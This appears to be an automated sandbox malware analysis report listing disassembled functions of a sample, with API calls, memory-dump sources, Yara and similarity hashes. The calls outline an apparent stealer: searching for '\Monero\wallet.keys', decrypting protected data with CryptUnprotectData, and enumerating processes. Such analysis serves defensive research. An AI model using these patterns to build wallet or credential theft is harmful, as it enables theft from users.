                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: a9b35d9a094cafaebf4e8f2da11b78130fca7a90a13bc09dd1d68155f5ac659d
                                    • Instruction ID: a84943b41c37cd29da9ad5e61304c637b8bfae034f35d0997914ab652976b337
                                    • Opcode Fuzzy Hash: a9b35d9a094cafaebf4e8f2da11b78130fca7a90a13bc09dd1d68155f5ac659d
                                    • Instruction Fuzzy Hash: 42415C71950218ABDB24DF95DC99BEEB778FF44700F204299E50AA2181DB342F89CFA1
                                    Function 00C3E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C50D73), ref: 00C3E4A2
                                    • StrCmpCA.SHLWAPI(?,00C514F8), ref: 00C3E4F2
                                    • StrCmpCA.SHLWAPI(?,00C514FC), ref: 00C3E508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3EBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: d84e3eb952e26aae74e8874422d22aee6c1209320a88762b95a8648d4149bb90
                                    • Instruction ID: c11abe0bff9ed55c2db3fd304ec223208bc92731c7e4f501e312f6b61ff20690
                                    • Opcode Fuzzy Hash: d84e3eb952e26aae74e8874422d22aee6c1209320a88762b95a8648d4149bb90
                                    • Instruction Fuzzy Hash: 06122172950118ABEB14FB60DC96EED7378BF54300F4145A9B90AA60D1EF306F89DF92
                                    Function 010022D6 Relevance: 9.2, Strings: 6, Instructions: 1671COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #1]7$/Mqy$Fp[g$OAn$]_$k-q
                                    • API String ID: 0-1761499864
                                    • Opcode ID: ffe81614f9d12f9968c9f3ab64ccb95c5fd00ec504fc69526907b6d7cd9e7908
                                    • Instruction ID: b8ec23924fe1371369ae41aa8d06da1fe86091fb91f91666e9f8690632925262
                                    • Opcode Fuzzy Hash: ffe81614f9d12f9968c9f3ab64ccb95c5fd00ec504fc69526907b6d7cd9e7908
                                    • Instruction Fuzzy Hash: A1B24AF3A0C214AFE3046E2DEC8567ABBE9EF94760F1A453DE6C4C7344EA3558008796
                                    Function 00FFCFF0 Relevance: 9.2, Strings: 6, Instructions: 1653COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Q?$dq!.$fWq$m^W${i?~$z[3
                                    • API String ID: 0-630982637
                                    • Opcode ID: 1c20221849eba711fc8666ead54a6ce755f0aa21784db733563e5275aca2a7d2
                                    • Instruction ID: bd56bac2c819ed1158a1a718e882bd4d7151a70d852e997a6da4b5b6997c0cd3
                                    • Opcode Fuzzy Hash: 1c20221849eba711fc8666ead54a6ce755f0aa21784db733563e5275aca2a7d2
                                    • Instruction Fuzzy Hash: C3B219F3A0C2049FE3046E2DEC8567BBBE9EF94720F16463DEAC5C3744EA3558058696
                                    Function 01008D48 Relevance: 9.1, Strings: 6, Instructions: 1589COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: '5}M$6Bd|$@cSx$`\7$qV~$q^|
                                    • API String ID: 0-287118796
                                    • Opcode ID: d8f906e6819b7b21ec2f10a599b8566c1c04f45f489832aac962f283af46a678
                                    • Instruction ID: 0e9205b96cbbb5b5cd1b973e4a710525c182de2b6c662fcc52b62f288fb4e75a
                                    • Opcode Fuzzy Hash: d8f906e6819b7b21ec2f10a599b8566c1c04f45f489832aac962f283af46a678
                                    • Instruction Fuzzy Hash: 7FB2F5F3A0C2009FE3046E29EC8577AFBE9EF94720F1A492DE6C487744EA3558058797
                                    Function 0100F782 Relevance: 9.1, Strings: 6, Instructions: 1583COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: EV?s$H(oO$UTw?$Xwo$[L+?$o"w
                                    • API String ID: 0-1360323756
                                    • Opcode ID: 9160b8ef0602a3871eceafb31a41df1c96dcec33a6f19925814d5a2cbb1a25c0
                                    • Instruction ID: e8b02b9e5326f3015e6f58f8c28899292900f2b07ea8af627bc4a077c85f84e0
                                    • Opcode Fuzzy Hash: 9160b8ef0602a3871eceafb31a41df1c96dcec33a6f19925814d5a2cbb1a25c0
                                    • Instruction Fuzzy Hash: C0B2F4F350C3049FE304AE2DEC8567AFBE5EF94320F1A4A2DEAD487744EA3558418697
                                    Function 00C3C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C3C871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C3C87C
                                    • lstrcat.KERNEL32(?,00C50B46), ref: 00C3C943
                                    • lstrcat.KERNEL32(?,00C50B47), ref: 00C3C957
                                    • lstrcat.KERNEL32(?,00C50B4E), ref: 00C3C978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: d6bf788de7e549534f98a6226b72e7befc931355b3958aacf44485eee94cc652
                                    • Instruction ID: 54a5ce13cac743437e3a9a320c32a8cf1d985954cbaa5238e13eb55bc72d6612
                                    • Opcode Fuzzy Hash: d6bf788de7e549534f98a6226b72e7befc931355b3958aacf44485eee94cc652
                                    • Instruction Fuzzy Hash: 62416EB590420ADFDB10DFA0DD89BFEB7B8BB84304F1441B8E509B6280D7745A88CF92
                                    Function 00C37240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C3724D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C37254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C37281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00C372A4
                                    • LocalFree.KERNEL32(?), ref: 00C372AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: d3cf2e5419f88daeb6a46e5f4f63505669ec6188253551036aa849663bac4870
                                    • Instruction ID: 78bf64b4386e4890d85681ebd13a1b0fd44b6b079a9a40f6d0d85c1f47fdd8f4
                                    • Opcode Fuzzy Hash: d3cf2e5419f88daeb6a46e5f4f63505669ec6188253551036aa849663bac4870
                                    • Instruction Fuzzy Hash: C20140B5A40208BFEB14DBD4DD4AF9E7778AB44700F144154FB09BA2C0D670AA448B66
                                    Function 00C49600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C4961E
                                    • Process32First.KERNEL32(00C50ACA,00000128), ref: 00C49632
                                    • Process32Next.KERNEL32(00C50ACA,00000128), ref: 00C49647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 00C4965C
                                    • CloseHandle.KERNEL32(00C50ACA), ref: 00C4967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 138af7f0259d7b807b0c172ae6034491190b03ae30a507a60d3698ef83280a1f
                                    • Instruction ID: 0a03d126868c0abf6a5924f4a7feef271f0d74d1add40938adf6b6ff81020a65
                                    • Opcode Fuzzy Hash: 138af7f0259d7b807b0c172ae6034491190b03ae30a507a60d3698ef83280a1f
                                    • Instruction Fuzzy Hash: 36010C75A00218AFDB64DFA6DD48BEEB7F8FB48301F144199B909A6240D7749B84CF51
                                    Function 00FF9993 Relevance: 6.7, Strings: 4, Instructions: 1653COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ma}^$sq|$<&{$o
                                    • API String ID: 0-3559195441
                                    • Opcode ID: f4c66c950c0cde68bea905bf0e7e79361198515afafd80281be29bd2917c33fe
                                    • Instruction ID: f6134ce39673a8ebeaecc26a367fc462f76792a9a08be3e045e7028dc2cdbb51
                                    • Opcode Fuzzy Hash: f4c66c950c0cde68bea905bf0e7e79361198515afafd80281be29bd2917c33fe
                                    • Instruction Fuzzy Hash: 62B218F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A493DE6C5C3744EA3558058697
                                    Function 0100A7D2 Relevance: 6.6, Strings: 4, Instructions: 1631COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: &;;^$Jg2$rw{$}[Q
                                    • API String ID: 0-4121264173
                                    • Opcode ID: 20ad46fecd682ecb21a678baf0c03bcd3e56eff1fb2db47556aa75bb67be47c1
                                    • Instruction ID: c9e33e0ce2aa1643eca7df283e29cd2633e63cde7ac038978f18620eaa9833e2
                                    • Opcode Fuzzy Hash: 20ad46fecd682ecb21a678baf0c03bcd3e56eff1fb2db47556aa75bb67be47c1
                                    • Instruction Fuzzy Hash: F4B215F36082009FE704AE2DEC8567AFBE9EF94320F1A493DE6C4C7744E67598058697
                                    Function 01003EBF Relevance: 6.6, Strings: 4, Instructions: 1576COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
